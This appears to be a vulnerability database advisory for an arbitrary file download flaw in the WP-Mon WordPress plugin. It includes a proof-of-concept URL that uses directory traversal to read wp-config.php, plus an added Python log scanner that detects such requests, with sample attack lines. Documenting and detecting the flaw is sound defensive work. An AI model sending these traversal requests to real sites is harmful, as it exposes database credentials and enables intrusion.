WP-Mon - Arbitrary File Download



Proof of Concept
As seen in access logs:
http://www.example.com/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php
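A detection check for the request shown above, as an added example that is not part of the original advisory or the plugin's code. The endpoint path and the `path`/`name` parameters come from the logged URL; the combined access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter names taken from the logged request in the advisory.
ENDPOINT = "/wp-content/plugins/wp-mon/assets/download.php"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (combined log format assumed; addresses are documentation ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Apr/2015:10:01:22 +0000] "GET /wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php HTTP/1.1" 200 3120 "-" "curl/7.38.0"',
    '203.0.113.7 - - [16/Apr/2015:10:01:25 +0000] "GET /wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=%252e%252e%252f%252e%252e%252f&name=wp-config.php HTTP/1.1" 404 0 "-" "curl/7.38.0"',
    '198.51.100.4 - - [16/Apr/2015:10:02:00 +0000] "GET /wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=reports/&name=uptime.csv HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [16/Apr/2015:10:02:05 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (%252e%252e -> ..) and normalise backslashes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def inspect_line(line):
    """Return a finding dict for a suspicious wp-mon download request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if parts.path.lower() != ENDPOINT:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes one layer
    path = fully_decode(params.get("path", [""])[0])
    name = fully_decode(params.get("name", [""])[0])
    reasons = []
    if ".." in path.split("/") or ".." in name.split("/"):
        reasons.append("directory traversal")
    if path.startswith("/"):
        reasons.append("absolute path")
    if not reasons:
        return None
    status = int(m.group(2))
    return {"path": path, "name": name, "status": status,
            "served": status == 200, "reasons": reasons}

def scan(lines):
    """Collect findings for every line that matches the traversal pattern."""
    return [f for f in map(inspect_line, lines) if f]
```

A finding with `served` set to true means the server answered 200, so the named file should be treated as disclosed and any secrets in it rotated.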

Affects Plugin

No known fix (plugin closed)

References

PacketStorm 131502

Classification

Type: RFI
OWASP Top 10: A1: Injection
CWE: CWE-98

Miscellaneous

Submitter: pvdl
Views: 6673
Verified: No
WPVDB ID: 7911

Timeline

Publicly Published: 2015-04-16 (about 5 years ago)
Added: 2015-04-20 (about 5 years ago)
Last Updated: 2019-10-21 (9 months ago)
